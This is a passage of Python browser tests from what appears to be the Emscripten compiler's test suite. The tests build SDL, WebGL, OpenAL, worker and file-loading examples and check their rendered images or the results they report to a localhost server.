self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
run_process([PYTHON, EMCC, path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
self.set_setting('ASM_JS', 1)
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [[], ['--closure', '1']]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
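# Build supp.cpp as a side module and have the main module link it at startup via RUNTIME_LINKED_LIBS,
# checking both the asm.js (WASM=0) and wasm (WASM=1) variants.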
for wasm in [0, 1]:
print(wasm)
main, supp = self.setup_runtimelink_test()
open('supp.cpp', 'w').write(supp)
run_process([PYTHON, EMCC, 'supp.cpp', '-o', 'supp.' + ('wasm' if wasm else 'js'), '-s', 'SIDE_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'EXPORT_ALL=1'])
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'RUNTIME_LINKED_LIBS=["supp.' + ('wasm' if wasm else 'js') + '"]', '-s', 'EXPORT_ALL=1'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency();
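// called without an id: this just bumps the pending-dependency counter; run() is deferred until
// removeRunDependency() drops it back to zero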
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write('''
var assert = function(check, text) {
if (!check) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?9');
xhr.onload = function() {
window.close();
};
xhr.send();
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''' % self.test_port)
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
def test_mem_init_request(self):
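# Point Module.memoryInitializerRequest at a URL before startup; if the fetch fails, the runtime warns
# 'a problem seems to have happened with Module.memoryInitializerRequest', which the pre.js below
# converts into result 0.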
def test(what, status):
print(what, status)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.test_port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
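# Calling into compiled code before the runtime is initialized must abort (when ASSERTIONS are on).
# Three call paths are built below - ccall, cwrap, and a direct Module._fn call - and each is
# exercised both too early and at a valid time (from main, and after exit with EXIT_RUNTIME).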
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so the direct call will abort
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 1000);
''' % self.test_port
open('pre_runtime.js', 'w').write(r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=1']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync startup, call too late')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync, runtime still alive, so all good')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORT_ALL=1'], expected='8')
def test_preload_module(self):
open('library.c', 'w').write(r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
run_process([PYTHON, EMCC, 'library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
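# rename to .so, presumably so the preload plugin treats it as a shared library; the EM_ASM check
# below looks it up under Module['preloadedWasm']['/library.so']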
os.rename('library.wasm', 'library.so')
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", 0);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '-s', 'WASM=1', '--use-preload-plugins', '-s', 'EXPORT_ALL=1'],
expected='0')
def test_mmap_file(self):
open(self.in_dir('data.dat'), 'w').write('data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
outdir = os.getcwd()
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the browser that is launched will have that directory as its startup directory,
# and the browser will not close as part of the test, pinning down the cwd on Windows so that it cannot be deleted. Therefore switch away from that directory
# before launching.
os.chdir(path_from_root())
args = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and '-profile' in browser_args:
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args += ['--browser_args', ' ' + ' '.join(browser_args)]
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
proc = run_process(args, check=False)
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert proc.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
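# A minimal standalone sketch (not part of the harness) of the EMTEST_BROWSER parsing
# done in test_zzz_emrun above: split the browser command with shlex and use
# argparse.parse_known_args to drop a user-supplied -profile, since emrun supplies its
# own profile. The function name and return shape are illustrative only.
def split_emtest_browser(emtest_browser):
  import argparse
  import shlex
  cmd = shlex.split(emtest_browser)  # e.g. "firefox -profile /path/to/foo -headless"
  browser_path, browser_args = cmd[0], cmd[1:]
  if 'firefox' in browser_path and '-profile' in browser_args:
    parser = argparse.ArgumentParser(add_help=False)  # add_help=False so flags like -headless pass through
    parser.add_argument('-profile')
    browser_args = parser.parse_known_args(browser_args)[1]
  return browser_path, browser_args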
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compile.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut'], timeout=30)
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high-quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
run_process([PYTHON, EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'], stdout=PIPE, stderr=PIPE)
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
open('pre.js', 'w').write(r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=opts, expected='0', timeout=20)
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0', timeout=20)
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
@requires_graphics_hardware
# Verify bug https://github.com/kripken/emscripten/issues/4556: creating a WebGL context on Module.canvas when no ID has been explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL'], expected='0', timeout=20)
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0', timeout=20)
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0', timeout=20)
# Test for PR#5373 (https://github.com/kripken/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
def test_webgl2(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'] + opts, expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'USE_WEBGL2=1', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'USE_WEBGL2=1', '-s', 'GL_ASSERTIONS=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_codemods(self):
# tests asm.js client-side code modifications
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = ['-O' + str(opt_level), '-s', 'WASM=0']
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=opts)
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
def test_wget(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1'])
print('asyncify+emterpreter')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1', '-s', 'EMTERPRETIFY=1'])
print('emterpreter by itself')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
def test_wget_data(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2'])
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2', '-s', 'ASSERTIONS=1'])
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
open('data.txt', 'w').write('load me right before...')
open('pre.js', 'w').write('Module.locateFile = function(x) { return "sub/" + x };')
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
run_process([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)])
os.mkdir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
open('shell.html', 'w').write('''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
run_process([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
